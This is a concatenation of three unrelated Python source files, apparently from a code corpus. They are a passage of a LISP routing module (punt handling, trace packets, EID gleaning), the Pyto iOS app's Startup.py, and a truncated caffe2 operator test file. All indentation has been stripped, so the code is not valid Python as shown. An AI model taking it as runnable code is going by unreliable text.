#
# Process stats counters in lisp-etr and lisp-rtr processes. Variable 'msg'
# is a dictionary array when the ITR/RTR is processing it. When an ETR is
# processing it, it received a JSON string from the ITR, so it needs to be
# converted to a dictionary array.
#
ipc = bold("IPC", False)
lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
if (lisp_i_am_etr): msg = json.loads(msg)
key_names = ["good-packets", "ICV-error", "checksum-error",
"lisp-header-error", "no-decrypt-key", "bad-inner-version",
"outer-header-error"]
for key_name in key_names:
pc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["packet-count"]
lisp_decap_stats[key_name].packet_count += pc
bc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["byte-count"]
lisp_decap_stats[key_name].byte_count += bc
ts = 0 if msg.has_key(key_name) == False else \
msg[key_name]["seconds-last-packet"]
lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
#endfor
return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a map-request, or store statistics data. The formats of the JSON
# messages are for types: "discovery", "restart", "statistics", and "decap-
# statistics". This function calls functions for the stats and restart types
# but this function processes logic for:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
# The "statistics", "decap-statistics", and "restart" formats are documented
# above their respective handler functions.
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
message, source = punt_socket.recvfrom(4000)
msg = json.loads(message)
if (type(msg) != dict):
lprint("Invalid punt message from {}, not in JSON format". \
format(source))
return
#endif
punt = bold("Punt", False)
lprint("{} message from '{}': '{}'".format(punt, source, msg))
if (msg.has_key("type") == False):
lprint("Punt IPC message has no 'type' key")
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "statistics"):
lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
return
#endif
if (msg["type"] == "decap-statistics"):
lisp_process_data_plane_decap_stats(msg, punt_socket)
return
#endif
#
# Process restart message.
#
if (msg["type"] == "restart"):
lisp_process_data_plane_restart()
return
#endif
#
# Process possible punt packet discovery message.
#
if (msg["type"] != "discovery"):
lprint("Punt IPC message has wrong format")
return
#endif
if (msg.has_key("interface") == False):
lprint("Invalid punt message from {}, required keys missing". \
format(source))
return
#endif
#
# Drop control-messages designated as instance-ID 0xffffff (or -1 in JSON).
#
device = msg["interface"]
if (device == ""):
iid = int(msg["instance-id"])
if (iid == -1): return
else:
iid = lisp_get_interface_instance_id(device, None)
#endif
#
# Validate EID format.
#
seid = None
if (msg.has_key("source-eid")):
source_eid = msg["source-eid"]
seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
if (seid.is_null()):
lprint("Invalid source-EID format '{}'".format(source_eid))
return
#endif
#endif
deid = None
if (msg.has_key("dest-eid")):
dest_eid = msg["dest-eid"]
deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
if (deid.is_null()):
lprint("Invalid dest-EID format '{}'".format(dest_eid))
return
#endif
#endif
#
# Do source-EID discovery.
#
# Make sure we have a configured database-mapping entry for this EID.
#
if (seid):
e = green(seid.print_address(), False)
db = lisp_db_for_lookups.lookup_cache(seid, False)
if (db != None):
#
# Check accept policy and if accepted, discover EID by putting
# in discovery cache. ETR will register it.
#
if (db.dynamic_eid_configured()):
interface = lisp_allow_dynamic_eid(device, seid)
if (interface != None and lisp_i_am_itr):
lisp_itr_discover_eid(db, seid, device, interface)
else:
lprint(("Disallow dynamic source-EID {} " + \
"on interface {}").format(e, device))
#endif
#endif
else:
lprint("Punt from non-EID source {}".format(e))
#endif
#endif
#
# Do Map-Request processing on destination.
#
if (deid):
mc = lisp_map_cache_lookup(seid, deid)
if (mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION):
#
# Check if we should rate-limit Map-Request and if not send
# Map-Request.
#
if (lisp_rate_limit_map_request(seid, deid)): return
lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
seid, deid, None)
else:
e = green(deid.print_address(), False)
lprint("Map-cache entry for {} already exists".format(e))
#endif
#endif
return
#enddef
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
#
def lisp_ipc_map_cache_entry(mc, jdata):
entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
jdata.append(entry)
return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in the lisp_map_cache(). And then subsequently walk the
# entries in lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))
if (mc.source_cache == None): return([True, jdata])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
return([True, jdata])
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
lisp_ipc_listen_socket):
eid_str = eid.print_address()
if (db.dynamic_eids.has_key(eid_str)):
db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
return
#endif
#
# Add to list.
#
dyn_eid = lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = routed_interface
dyn_eid.last_packet = lisp_get_timestamp()
dyn_eid.get_timeout(routed_interface)
db.dynamic_eids[eid_str] = dyn_eid
routed = ""
if (input_interface != routed_interface):
routed = ", routed-interface " + routed_interface
#endif
eid_string = green(eid_str, False) + bold(" discovered", False)
lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
eid_string,input_interface, routed, dyn_eid.timeout))
#
# Tell ETR process so it can register dynamic-EID.
#
ipc = "learn%{}%{}".format(eid_str, routed_interface)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_retry_decap_keys
#
# A decap-key was copied from x.x.x.x:p to x.x.x.x, but it was the wrong one.
# Copy x.x.x.x:q to x.x.x.x. This is an expensive function. But it is hardly
# used. And once it is used for a particular addr_str, it shouldn't be used
# again.
#
# This function is only used when an ICV error occurs when x.x.x.x is the
# crypto-key used.
#
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
if (lisp_search_decap_keys == False): return
#
# Only use this function when the key matched was not port based.
#
if (addr_str.find(":") != -1): return
parent = lisp_crypto_keys_by_rloc_decap[addr_str]
for key in lisp_crypto_keys_by_rloc_decap:
#
# Find entry that has same source RLOC.
#
if (key.find(addr_str) == -1): continue
#
# Skip over parent entry.
#
if (key == addr_str): continue
#
# If crypto-keys are the same, go find the next one.
#
entry = lisp_crypto_keys_by_rloc_decap[key]
if (entry == parent): continue
#
# Try ICV check. If it works, then use this key.
#
crypto_key = entry[1]
if (packet_icv != crypto_key.do_icv(packet, iv)):
lprint("Test ICV with key {} failed".format(red(key, False)))
continue
#endif
lprint("Changing decap crypto key to {}".format(red(key, False)))
lisp_crypto_keys_by_rloc_decap[addr_str] = entry
#endfor
return
#enddef
#
# lisp_decent_pull_xtr_configured
#
# Return True if the configured LISP-Decent modulus is not 0, meaning we are
# using the LISP-Decent pull-based mapping system.
#
def lisp_decent_pull_xtr_configured():
return(lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
#enddef
#
# lisp_is_decent_dns_suffix
#
# Return True if supplied DNS name ends with a configured LISP-Decent DNS
# suffix.
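#
# For example (hypothetical), with suffix "map.lispers.net", the name
# "5.map.lispers.net" matches after its leading label is stripped.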
#
def lisp_is_decent_dns_suffix(dns_name):
if (lisp_decent_dns_suffix == None): return(False)
name = dns_name.split(".")
name = ".".join(name[1::])
return(name == lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_index
#
# Hash the EID-prefix and mod the configured LISP-Decent modulus value.
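#
# For example (hypothetical), with lisp_decent_modulus = 16, an EID whose
# sha256 hex digest ends in ...e7 hashes to index 0xe7 % 16 = 7.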
#
def lisp_get_decent_index(eid):
eid_str = eid.print_prefix()
hash_value = hashlib.sha256(eid_str).hexdigest()
index = int(hash_value, 16) % lisp_decent_modulus
return(index)
#enddef
#
# lisp_get_decent_dns_name
#
# Based on EID, get index and prepend to LISP-Decent DNS name suffix.
#
def lisp_get_decent_dns_name(eid):
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_get_decent_dns_name_from_str
#
# The supplied EID is passed as a string. Build an internal
# lisp_address() to pass into lisp_get_decent_index().
#
def lisp_get_decent_dns_name_from_str(iid, eid_str):
eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
index = lisp_get_decent_index(eid)
return(str(index) + "." + lisp_decent_dns_suffix)
#enddef
#
# lisp_trace_append
#
# Append JSON data to trace packet. If this is the ETR, the EIDs will be
# swapped to return packet to originator.
#
# Returning False means the caller should return (and not forward the packet).
#
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
rloc_entry=None):
offset = 28 if packet.inner_version == 4 else 48
trace_pkt = packet.packet[offset::]
trace = lisp_trace()
if (trace.decode(trace_pkt) == False):
lprint("Could not decode JSON portion of a LISP-Trace packet")
return(False)
#endif
next_rloc = "?" if packet.outer_dest.is_null() else \
packet.outer_dest.print_address_no_iid()
#
# Display the port if the caller is an encapsulating RTR using a translated
# RLOC.
#
if (next_rloc != "?" and packet.encap_port != LISP_DATA_PORT):
if (ed == "encap"): next_rloc += ":{}".format(packet.encap_port)
#endif
#
# Add node entry data for the encapsulation or decapsulation.
#
entry = {}
entry["node"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr else \
"RTR" if lisp_i_am_rtr else "?"
srloc = packet.outer_source
if (srloc.is_null()): srloc = lisp_myrlocs[0]
entry["srloc"] = srloc.print_address_no_iid()
#
# In the source RLOC include the ephemeral port number of the ltr client
# so RTRs can return errors to the client behind a NAT.
#
if (entry["node"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
entry["srloc"] += ":{}".format(packet.inner_sport)
#endif
entry["hn"] = lisp_hostname
key = ed + "-ts"
entry[key] = lisp_get_timestamp()
#
# If this is an ETR decap entry and the drloc is "?", the packet came in on
# lisp_etr_nat_data_plane() where the kernel strips the outer header. Get
# the local/private RLOC from our database-mapping.
#
if (next_rloc == "?" and entry["node"] == "ETR"):
db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db != None and len(db.rloc_set) >= 1):
next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
#endif
#endif
entry["drloc"] = next_rloc
#
# If there is a reason there is no dest RLOC, include it.
#
if (next_rloc == "?" and reason != None):
entry["drloc"] += " ({})".format(reason)
#endif
#
# Add recent-rtts and recent-hops.
#
if (rloc_entry != None):
entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
entry["hops"] = rloc_entry.recent_rloc_probe_hops
#endif
#
# Build seid->deid record if it does not exist. Then append node entry
# to record below, in the search loop.
#
seid = packet.inner_source.print_address()
deid = packet.inner_dest.print_address()
if (trace.packet_json == []):
rec = {}
rec["seid"] = seid
rec["deid"] = deid
rec["paths"] = []
trace.packet_json.append(rec)
#endif
#
# Search for record. If we are appending the first ITR node entry, get its
# RLOC address in case we have to return-to-sender.
#
for rec in trace.packet_json:
if (rec["deid"] != deid): continue
rec["paths"].append(entry)
break
#endfor
#
# If we are destination-EID, add a new record deid->seid if we have not
# completed a round-trip. The ETR will deliver this packet from its own
# EID which means the co-located ITR will pcap the packet and add its
# encap node entry.
#
swap = False
if (len(trace.packet_json) == 1 and entry["node"] == "ETR" and
trace.myeid(packet.inner_dest)):
rec = {}
rec["seid"] = deid
rec["deid"] = seid
rec["paths"] = []
trace.packet_json.append(rec)
swap = True
#endif
#
# Print the JSON packet after we appended data to it. Put the new JSON in
# packet. Fix up lengths and checksums from inner headers.
#
trace.print_trace()
trace_pkt = trace.encode()
#
# If next_rloc is not known, we need to return packet to sender.
#
# Otherwise we are forwarding a packet that is about to be encapsulated or we
# are forwarding a packet that was just decapsulated with the addresses
# swapped so we can turn it around.
#
sender_rloc = trace.packet_json[0]["paths"][0]["srloc"]
if (next_rloc == "?"):
lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
return(False)
#endif
#
# Compute length of trace packet. This includes the UDP header, Trace
# header, and JSON payload.
#
udplen = trace.packet_length()
#
# Fix up UDP length and recompute UDP checksum if IPv6 packet, zero
# otherwise. Only do checksum when the Trace went round-trip and this is
# the local ETR delivery EID-based Trace packet to the client ltr.
#
headers = packet.packet[0:offset]
p = struct.pack("HH", socket.htons(udplen), 0)
headers = headers[0:offset-4] + p
if (packet.inner_version == 6 and entry["node"] == "ETR" and
len(trace.packet_json) == 2):
udp = headers[offset-8::] + trace_pkt
udp = lisp_udp_checksum(seid, deid, udp)
headers = headers[0:offset-8] + udp[0:8]
#endif
#
# If we are swapping addresses, do it here so the JSON append and IP
# header fields changes are all reflected in new IPv4 header checksum.
#
if (swap):
if (packet.inner_version == 4):
headers = headers[0:12] + headers[16:20] + headers[12:16] + \
headers[22:24] + headers[20:22] + headers[24::]
else:
headers = headers[0:8] + headers[24:40] + headers[8:24] + \
headers[42:44] + headers[40:42] + headers[44::]
#endif
d = packet.inner_dest
packet.inner_dest = packet.inner_source
packet.inner_source = d
#endif
#
# Fix up IP length.
#
offset = 2 if packet.inner_version == 4 else 4
iplen = 20 + udplen if packet.inner_version == 4 else udplen
h = struct.pack("H", socket.htons(iplen))
headers = headers[0:offset] + h + headers[offset+2::]
#
# Fix up IPv4 header checksum.
#
if (packet.inner_version == 4):
c = struct.pack("H", 0)
headers = headers[0:10] + c + headers[12::]
h = lisp_ip_checksum(headers[0:20])
headers = h + headers[20::]
#endif
#
# Caller is forwarding packet, either as an ITR, RTR, or ETR.
#
packet.packet = headers + trace_pkt
return(True)
#enddef
#
# lisp_allow_gleaning
#
# Check the lisp_glean_mappings array to see if we should glean the EID and
# RLOC. Find first match. Return False if there are no configured glean
# mappings. The second return value is either True or False depending if the
# matched entry was configured to RLOC-probe the RLOC for the gleaned entry.
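#
# For example (hypothetical), an entry of the form
# {"instance-id" : (1000, 2000), "rloc-probe" : True} matches any EID in
# instance-IDs 1000-2000 and requests RLOC-probing of the gleaned RLOC.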
#
def lisp_allow_gleaning(eid, rloc):
if (lisp_glean_mappings == []): return(False, False)
for entry in lisp_glean_mappings:
if (entry.has_key("instance-id")):
iid = eid.instance_id
low, high = entry["instance-id"]
if (iid < low or iid > high): continue
#endif
if (entry.has_key("eid-prefix")):
e = copy.deepcopy(entry["eid-prefix"])
e.instance_id = eid.instance_id
if (eid.is_more_specific(e) == False): continue
#endif
if (entry.has_key("rloc-prefix")):
if (rloc != None and rloc.is_more_specific(entry["rloc-prefix"])
== False): continue
#endif
return(True, entry["rloc-probe"])
#endfor
return(False, False)
#enddef
#
# lisp_glean_map_cache
#
# Add or update a gleaned EID/RLOC to the map-cache.
#
def lisp_glean_map_cache(eid, rloc, encap_port):
#
# First do lookup to see if EID is in map-cache. Check to see if RLOC
# or encap-port needs updating. If not, return. Set refresh timer since
# we received a packet from the source gleaned EID.
#
mc = lisp_map_cache.lookup_cache(eid, True)
if (mc and len(mc.rloc_set) != 0):
mc.last_refresh_time = lisp_get_timestamp()
cached_rloc = mc.rloc_set[0]
if (cached_rloc.rloc.is_exact_match(rloc) and
cached_rloc.translated_port == encap_port): return
e = green(eid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Gleaned EID {} RLOC changed to {}".format(e, r))
cached_rloc.delete_from_rloc_probe_list(mc.eid, mc.group)
else:
mc = lisp_mapping("", "", [])
mc.eid.copy_address(eid)
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_GLEAN_TTL
mc.gleaned = True
e = green(eid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Add gleaned EID {} to map-cache with RLOC {}".format(e, r))
mc.add_cache()
#endif
#
# Add RLOC to new map-cache entry or update RLOC for existing entry.
#
rloc_entry = lisp_rloc()
rloc_entry.store_translated_rloc(rloc, encap_port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
rloc_entry.priority = 253
rloc_entry.mpriority = 255
rloc_set = [rloc_entry]
mc.rloc_set = rloc_set
mc.build_best_rloc_set()
#enddef
#------------------------------------------------------------------------------
|
Startup.py
|
try:
import sys
import os
import zipfile
zippedLib = os.environ["ZIPPEDLIB"]
destDir = os.path.expanduser("~/Library/python38")
if not os.path.isdir(destDir):
with zipfile.ZipFile(zippedLib, "r") as zip_ref:
zip_ref.extractall(destDir)
sys.path.insert(-1, os.path.expanduser("~/Documents"))
sys.path.insert(-1, os.path.expanduser("~/Documents/site-packages"))
try:
os.remove(destDir+"/turtle.py")
except:
pass
try:
os.remove(destDir+"/pydoc.py")
except:
pass
try:
os.remove(destDir+"/pdb.py")
except:
pass
import io
import console
import code
import pyto
from importlib.machinery import SourceFileLoader
import importlib
import threading
from time import sleep
from outputredirector import Reader
from extensionsimporter import *
import warnings
import logging
from _ios_getpass import getpass as _ios_getpass
import getpass
import webbrowser
import sharing
import _signal
import traceback
import unittest
from pip import BUNDLED_MODULES
from ctypes import CDLL
# MARK: - Warnings
logging.basicConfig(level=logging.INFO)
def __send_warnings_to_log__(message, category, filename, lineno, file=None, line=None):
import platform
if platform.uname()[4] == "x86_64":
return
try:
warnings
except:
import warnings
try:
pyto
except:
import pyto
_message = warnings.formatwarning(message, category, filename, lineno, line)
try:
pyto.PyOutputHelper.printWarning(_message, script=threading.current_thread().script_path)
except AttributeError:
pyto.PyOutputHelper.printWarning(_message, script=None)
return
warnings.showwarning = __send_warnings_to_log__
warnings.filterwarnings("default")
# MARK: - Allow / Disallow subprocesses
os.allows_subprocesses = (not sys.platform == "ios")
# MARK: - Input
def askForInput(prompt=None):
try:
threading
except NameError:
import threading
try:
console
except NameError:
import console
if (threading.currentThread() in console.ignoredThreads):
return ""
else:
return console.input(prompt)
__builtins__.input = askForInput
getpass.getpass = _ios_getpass
# MARK: - Output
def read(text):
try:
console
except NameError:
import console
console.print(text, end="")
def write(txt):
try:
os
except NameError:
import os
try:
threading
except NameError:
import threading
if ("widget" not in os.environ) and (threading.currentThread() in console.ignoredThreads):
return
if txt.__class__ is str:
read(txt)
elif txt.__class__ is bytes:
text = txt.decode()
write(text)
standardOutput = Reader(read)
standardOutput._buffer = io.BufferedWriter(standardOutput)
standardOutput.buffer.write = write
standardError = Reader(read)
standardError._buffer = io.BufferedWriter(standardError)
standardError.buffer.write = write
sys.stdout = standardOutput
sys.stderr = standardError
# MARK: - Web browser
class MobileSafari(webbrowser.BaseBrowser):
'''
Mobile Safari web browser.
'''
def open(self, url, new=0, autoraise=True):
sharing.open_url(url)
return True
webbrowser.register("mobile-safari", None, MobileSafari("MobileSafari.app"))
# MARK: - Modules
sys.meta_path.insert(0, DownloadableImporter())
sys.meta_path.insert(1, FrameworksImporter())
# MARK: - Pre-import modules
def importModules():
try:
import PIL.ImageShow
def show_image(image, title=None, **options):
import os
import tempfile
import sharing
imgPath = tempfile.gettempdir()+"/image.png"
i = 1
while os.path.isfile(imgPath):
i += 1
imgPath = os.path.join(tempfile.gettempdir(), 'image '+str(i)+'.png')
image.save(imgPath, "PNG")
if title == "OpenCV":
sharing.quick_look(imgPath, remove_previous=True)
else:
sharing.quick_look(imgPath)
PIL.ImageShow.show = show_image
except:
pass
importModules()
def addOnDemandPaths():
paths = pyto.Python.shared.accessibleOnDemandPaths
for path in paths:
sys.path.append(str(path))
threading.Thread(target=addOnDemandPaths).start()
# MARK: - Deprecations
__builtins__.deprecated = []
# MARK: - Pip bundled modules
# Add modules to `bundled`. They are added one by one because, for some
# reason, setting an array directly fails **sometimes**. Seems like something
# new in iOS 13.5 but I'm not sure.
for module in BUNDLED_MODULES:
pyto.PipViewController.addBundledModule(module)
# MARK: - OS
def fork():
pass
def waitpid(pid, options):
return (-1, 0)
if os.system("ls") != 0: # App is sandboxed
os.fork = fork
os.waitpid = waitpid
os._exit = sys.exit
else: # Not sandboxed
_system = os.system
def system(cmd):
res = _system(cmd + " >>out.txt 2>&1")
try:
f = open("out.txt", "r")
sys.stdout.write(f.read())
f.close()
_system("rm out.txt")
except FileNotFoundError:
pass
return res
os.system = system
# MARK: - Handle signal called outside main thread
old_signal = _signal.signal
def signal(signal, handler):
try:
threading
except NameError:
import threading
if threading.main_thread() == threading.current_thread():
return old_signal(signal, handler)
else:
return None
_signal.signal = signal
# MARK: - Plugin
__builtins__.__editor_delegate__ = None
# MARK: - Unittest
_original_unittest_main = unittest.main
def _unittest_main(module='__main__', defaultTest=None, argv=None, testRunner=None, testLoader=unittest.defaultTestLoader, exit=True, verbosity=1, failfast=None, catchbreak=None, buffer=None, warnings=None):
_module = module
if module == "__main__":
thread = threading.current_thread()
try:
path = thread.script_path
_module = path.split("/")[-1]
_module = os.path.splitext(_module)[0]
except AttributeError:
pass
_original_unittest_main(_module, defaultTest, argv, testRunner, testLoader, exit, verbosity, failfast, catchbreak, buffer, warnings)
unittest.main = _unittest_main
# MARK: - Run script
def run():
CDLL(None).putenv(b"IS_PYTHON_RUNNING=1")
SourceFileLoader("main", "%@").load_module()
threading.Thread(target=run).start()
threading.Event().wait()
except Exception as e:
import traceback
from ctypes import CDLL
s = traceback.format_exc()
CDLL(None).logToNSLog(s.encode())
CDLL(None).logToNSLog(str(e).encode())
|
hypothesis_test.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import copy
import time
from functools import partial, reduce
from future.utils import viewitems, viewkeys
from hypothesis import assume, given, settings, HealthCheck
import hypothesis.strategies as st
import unittest
import os
from caffe2.python import core, workspace, tt_core, dyndep
import caffe2.python.hypothesis_test_util as hu
from caffe2.proto import caffe2_pb2
dyndep.InitOpsLibrary('@/caffe2/caffe2/fb/optimizers:sgd_simd_ops')
def sigmoid(x):
return 1.0 / (1.0 + np.exp(-x))
@st.composite
def _tensor_and_prefix(draw, dtype, elements, min_dim=1, max_dim=4, **kwargs):
dims_ = draw(
st.lists(hu.dims(**kwargs), min_size=min_dim, max_size=max_dim))
extra_ = draw(
st.lists(hu.dims(**kwargs), min_size=min_dim, max_size=max_dim))
assume(len(dims_) + len(extra_) < max_dim)
return (draw(hu.arrays(dims_ + extra_, dtype, elements)),
draw(hu.arrays(extra_, dtype, elements)))
def _tensor_and_indices(min_dim=1, max_dim=4, dtype=np.float32,
elements=None, **kwargs):
""" generates a tensor and a list of indices of larger tensor of same dim"""
data_dims_ = st.lists(hu.dims(**kwargs), min_size=min_dim, max_size=max_dim)
original_dim = st.integers(min_value=2, max_value=10)
return st.tuples(data_dims_, original_dim).flatmap(lambda pair: st.tuples(
st.just(pair[1]), # original dimension
hu.arrays(pair[0], dtype, elements), # data tensor
hu.arrays(pair[0][0], dtype=np.int64, elements=st.integers(
min_value=0, max_value=pair[1] - 1)),
))
_NUMPY_TYPE_TO_ENUM = {
np.float32: core.DataType.FLOAT,
np.int32: core.DataType.INT32,
np.bool: core.DataType.BOOL,
np.uint8: core.DataType.UINT8,
np.int8: core.DataType.INT8,
np.uint16: core.DataType.UINT16,
np.int16: core.DataType.INT16,
np.int64: core.DataType.INT64,
np.float64: core.DataType.DOUBLE,
}
def _dtypes(dtypes=None):
dtypes = dtypes if dtypes else [np.int32, np.int64, np.float32]
return st.sampled_from(dtypes)
def _test_binary(name, ref, filter_=None, gcs=hu.gcs,
test_gradient=False, allow_inplace=False, dtypes=_dtypes):
@given(
inputs=dtypes().flatmap(
lambda dtype: hu.tensors(
n=2, dtype=dtype,
elements=hu.elements_of_type(dtype, filter_=filter_))),
out=st.sampled_from(('Y', 'X1', 'X2') if allow_inplace else ('Y',)),
**gcs)
@settings(max_examples=3, timeout=100)
def test_binary(self, inputs, out, gc, dc):
op = core.CreateOperator(name, ["X1", "X2"], [out])
X1, X2 = inputs
self.assertDeviceChecks(dc, op, [X1, X2], [0])
# We only do gradient check with float32 types.
if test_gradient and X1.dtype == np.float32:
self.assertGradientChecks(gc, op, [X1, X2], 0, [0])
self.assertReferenceChecks(gc, op, [X1, X2], ref)
return test_binary
def _test_binary_broadcast(name, ref, filter_=None,
gcs=hu.gcs, allow_inplace=False, dtypes=_dtypes):
@given(
inputs=dtypes().flatmap(lambda dtype: _tensor_and_prefix(
dtype=dtype,
elements=hu.elements_of_type(dtype, filter_=filter_))),
in_place=(st.booleans() if allow_inplace else st.just(False)),
**gcs)
@settings(max_examples=3, timeout=100)
def test_binary_broadcast(self, inputs, in_place, gc, dc):
op = core.CreateOperator(
name, ["X1", "X2"], ["X1" if in_place else "Y"], broadcast=1)
X1, X2 = inputs
self.assertDeviceChecks(dc, op, [X1, X2], [0])
def cast_ref(x, y):
return (np.array(ref(x, y)[0], dtype=x.dtype), )
# gradient not implemented yet
# self.assertGradientChecks(gc, op, [X1, X2], 0, [0])
self.assertReferenceChecks(gc, op, [X1, X2], cast_ref)
return test_binary_broadcast
class TestOperators(hu.HypothesisTestCase):
def test_comparison_ops(self):
ops = {"LT": lambda x1, x2: [x1 < x2],
"LE": lambda x1, x2: [x1 <= x2],
"GT": lambda x1, x2: [x1 > x2],
"GE": lambda x1, x2: [x1 >= x2]}
for name, ref in viewitems(ops):
_test_binary(name, ref, gcs=hu.gcs_cpu_only)(self)
_test_binary_broadcast(name, ref, gcs=hu.gcs_cpu_only)(self)
@given(inputs=hu.tensors(n=2), in_place=st.booleans(), **hu.gcs)
def test_sum(self, inputs, in_place, gc, dc):
op = core.CreateOperator("Sum", ["X1", "X2"],
["Y" if not in_place else "X1"])
X1, X2 = inputs
self.assertDeviceChecks(dc, op, [X1, X2], [0])
self.assertGradientChecks(gc, op, [X1, X2], 0, [0])
@given(inputs=hu.tensors(n=2, min_dim=2, max_dim=2), **hu.gcs_cpu_only)
def test_row_mul(self, inputs, gc, dc):
op = core.CreateOperator("RowMul", ["X1", "X2"], ["Y"])
X1, Xtmp = inputs
X2 = Xtmp[:, 0]
def ref(x, y):
ret = np.zeros(shape=x.shape, dtype=x.dtype)
for i in range(y.size):
ret[i, ] = x[i, ] * y[i]
return [ret]
self.assertDeviceChecks(dc, op, [X1, X2], [0])
for i in range(2):
self.assertGradientChecks(gc, op, [X1, X2], i, [0])
self.assertReferenceChecks(gc, op, [X1, X2], ref)
@given(inputs=hu.tensors(n=2), **hu.gcs_cpu_only)
def test_max(self, inputs, gc, dc):
op = core.CreateOperator("Max", ["X1", "X2"], ["Y"])
X1, X2 = inputs
# Make X1 and X2 far from each other, since X1=X2 is not differentiable
# and the step size of gradient checker is 0.05
X1[np.logical_and(X1 >= X2 - 0.05, X1 <= X2)] -= 0.05
X1[np.logical_and(X1 <= X2 + 0.05, X1 >= X2)] += 0.05
self.assertDeviceChecks(dc, op, [X1, X2], [0])
for i in range(2):
self.assertGradientChecks(gc, op, [X1, X2], i, [0])
def elementwise_max(X, Y):
return [np.maximum(X, Y)]
self.assertReferenceChecks(gc, op, [X1, X2], elementwise_max)
def test_add(self):
def not_overflow(x):
if not isinstance(x, float):
return abs(x) < (1 << 30) - 1
return True
def ref(x, y):
return (x + y, )
_test_binary("Add", ref, filter_=not_overflow, test_gradient=True)(self)
_test_binary_broadcast("Add", ref, filter_=not_overflow)(self)
def test_sub(self):
def ref(x, y):
return (x - y, )
# TODO(jiayq): enable the broadcast gradient test when implemented.
_test_binary("Sub", ref, test_gradient=True)(self)
_test_binary_broadcast("Sub", ref)(self)
def test_mul(self):
def not_overflow(x):
if not isinstance(x, float):
return abs(x) < (1 << 15) - 1
return True
def ref(x, y):
return (x * y, )
_test_binary("Mul", ref, filter_=not_overflow, test_gradient=True)(self)
_test_binary_broadcast("Mul", ref, filter_=not_overflow)(self)
def test_div(self):
def ref(x, y):
return (x / y, )
def non_zero(x):
return abs(x) > 1e-2
def div_dtypes():
return st.sampled_from([np.float32, np.float64])
_test_binary(
"Div", ref, filter_=non_zero, test_gradient=True,
dtypes=div_dtypes, gcs=hu.gcs_cpu_only
)(self)
_test_binary(
"Div", ref, filter_=non_zero, test_gradient=False,
dtypes=div_dtypes
)(self)
_test_binary_broadcast(
"Div", ref, filter_=non_zero, dtypes=div_dtypes)(self)
@given(X=hu.tensor(), in_place=st.booleans(), **hu.gcs)
def test_negative(self, X, in_place, gc, dc):
op = core.CreateOperator("Negative", ["X"],
["Y" if not in_place else "X"])
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(), **hu.gcs)
def test_tanh(self, X, gc, dc):
op = core.CreateOperator("Tanh", "X", "Y")
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(), **hu.gcs)
def test_averaged_loss(self, X, gc, dc):
op = core.CreateOperator("AveragedLoss", ["X"], ["loss"])
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(), inplace=st.booleans(), **hu.gcs)
def test_softsign(self, X, inplace, gc, dc):
op = core.CreateOperator("Softsign", ["X"], ["X" if inplace else "Y"])
def softsign(X):
return (X / (1 + np.abs(X)),)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertReferenceChecks(gc, op, [X], softsign)
if inplace:
with self.assertRaises(Exception):
self.assertGradientChecks(gc, op, [X], 0, [0])
else:
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(
device_options=st.lists(
min_size=2,
max_size=4,
elements=st.sampled_from(hu.expanded_device_options)),
set_seed=st.booleans())
def test_random_seed_behaviour(self, device_options, set_seed):
